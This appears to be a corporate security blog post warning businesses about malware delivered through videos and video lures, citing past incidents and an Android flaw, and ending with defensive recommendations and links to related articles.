Most employees have some awareness about malware attacks. Many probably know that you should never open an executable file from a stranger or install a thumb drive found in the parking lot, for example. But videos, or links to videos, can deliver malware just like that executable or thumb drive. Do your employees know this too? And even if they do know it, will they be tricked into chasing malicious videos anyway?

Here’s why it’s time to start focusing on video malware.

Video Is the Perfect Bait for Social Engineering

The lure of video might be the perfect social engineering trick for malware attacks. Recent trends in person-to-person communications and social media have conditioned the public to compulsively open many videos every day. Facebook and Instagram have been retrofitted with viral, addictive video features to keep up with upstarts such as Snapchat and TikTok. YouTube has always emphasized compelling videos, and messaging applications are increasingly carrying video as well.

In other words, video has emerged as the digital “drug” of choice when it comes to escapism, boredom relief and information delivery. As a bonus for cybercriminals, users may believe video files to be harmless, meaning even security-savvy users who would otherwise avoid clicking on suspicious links are likely to open and play videos.

The video habit (or addiction) in our culture has paved the way for video malware — malicious code embedded into video files. Video malware is part of a larger trend toward more effective stealth in the delivery of malware. It’s also the latest, and probably the most interesting, example of malicious steganography — the embedding of something secret inside some other medium. When the medium is an executable file, it’s called stegware.

Malware has been embedded in still-image file formats, such as JPG, PNG and BMP formats, for years. Now, it appears that video malware is having a moment.

The Latest From the Dangerous Video Front

Because of the irresistible appeal of videos, threat actors have been using the promise of video for many years. One common way to trick people into clicking on a malicious link is to ask, “Are you in this video?” The idea that an embarrassing video of yourself is publicly circulating can compel otherwise educated and rational people to open a video or click on a link, just to be sure. This tactic is common on major messaging platforms, where attackers can make it seem like the video or link was sent by a friend or colleague.

There are more sophisticated versions of this technique. For example, even back in 2014, malware called Trojan.FakeFlash.A. appeared to place a photo of a Facebook “friend” on victims’ Facebook feeds with text that implied clicking would launch a highly personal video of that friend, according to USA Today. The malware infected some 2 million systems worldwide.

Neither of these malware attacks involve actual videos — just the promise of videos to incentivize users into clicking on links or opening files. Other recent vulnerabilities and attacks have involved actual videos, as part of the ongoing evolution of video as a malware delivery method.

One recent example observed by Trend Micro involved embedding malware into a Word document containing a video. This is a relatively easy way to insert malware, because it could simply be added to an XML file in the Word folder. Then, the document could be modified so that when a victim opens it and clicks on the video, the malicious code is executed. In July, Symantec discovered another attack vector called media file jacking that enabled attackers to alter videos and images on both WhatsApp and Telegram — fortunately, not in a way that enabled code execution.

Yet another vulnerability discovered in Android offers a glimpse at what’s possible in the distribution of video malware. The vulnerability in Android versions 7–9 (Nougat, Oreo and Pie) could enable cybercriminals to execute code remotely via video-embedded malware. The video would have to be sent directly — for example, as an email attachment — because video services such as YouTube re-encode uploaded videos, thus modifying the malicious code and preventing it from working.

Google has since issued a security update that fixes the flaw, so those devices with the update are safe. Those without the patch (theoretically, more than 1 billion devices), however, are still at risk — especially since the fix unavoidably advertised the vulnerability to threat actors. While there has been no reported exploitation of the vulnerability, it suggests previously unexpected possibilities in the realm of video malware.

Following the trends — growing comfort with video, sophisticated techniques for stealth and increasing targeting of mobile devices — we can see the aggressive exploration of the possibilities around smuggling malware in videos. The time to get counter-steganographic is now.

How to Address the Threat of Video Malware Attacks

The scariest threats are the ones that nobody has heard of or is expecting. But recent events show that video malware is an intense area of interest for malware social engineering (and now also software engineering). Here are some steps to prepare your enterprise to expect the unexpected:

  • Architect a unified defensive posture — i.e., break down those cybersecurity silos.
  • Make an advanced unified endpoint management (UEM) solution the core of your defenses.
  • Use threat intelligence to stay on top of recent steganographic attacks and vulnerabilities.
  • Block Word documents containing embedded videos from entering corporate networks.
  • As always, stay current on patches and updates for all systems and devices, especially mobile devices.

Your users love videos. And because of the compelling, visceral and viral nature of videos, they’re going to be opening them. Threat actors know this, and they’re always working on new ways to hide malicious code inside videos. Is your enterprise security team ready to fight back?

More from Endpoint

Combining EPP and EDR tools can boost your endpoint security

6 min read - Endpoint protection platform (EPP) and endpoint detection and response (EDR) tools are two security products commonly used to protect endpoint systems from threats. EPP is a comprehensive security solution that provides a range of features to detect and prevent threats to endpoint devices. At the same time, EDR is specifically designed to monitor, detect and respond to endpoint threats in real-time. EPP and EDR have some similarities, as they both aim to protect endpoints from threats, but they also have…

The needs of a modernized SOC for hybrid cloud

5 min read - Cybersecurity has made a lot of progress over the last ten years. Improved standards (e.g., MITRE), threat intelligence, processes and technology have significantly helped improve visibility, automate information gathering (SOAR) and many manual tasks. Additionally, new analytics (UEBA/SIEM) and endpoint (EDR) technologies can detect and often stop entire classes of threats. Now we are seeing the emergence of technologies such as attack surface management (ASM), which are starting to help organisations get more proactive and focus their efforts for maximum…

X-Force identifies vulnerability in IoT platform

4 min read - The last decade has seen an explosion of IoT devices across a multitude of industries. With that rise has come the need for centralized systems to perform data collection and device management, commonly called IoT Platforms. One such platform, ThingsBoard, was the recent subject of research by IBM Security X-Force. While there has been a lot of discussion around the security of IoT devices themselves, there is far less conversation around the security of the platforms these devices connect with.…

X-Force prevents zero day from going anywhere

8 min read - This blog was made possible through contributions from Fred Chidsey and Joseph Lozowski. The 2023 X-Force Threat Intelligence Index shows that vulnerability discovery has rapidly increased year-over-year and according to X-Force’s cumulative vulnerability and exploit database, only 3% of vulnerabilities are associated with a zero day. X-Force often observes zero-day exploitation on Internet-facing systems as a vector for initial access however, X-Force has also observed zero-day attacks leveraged by attackers to accomplish their goals and objectives after initial access was…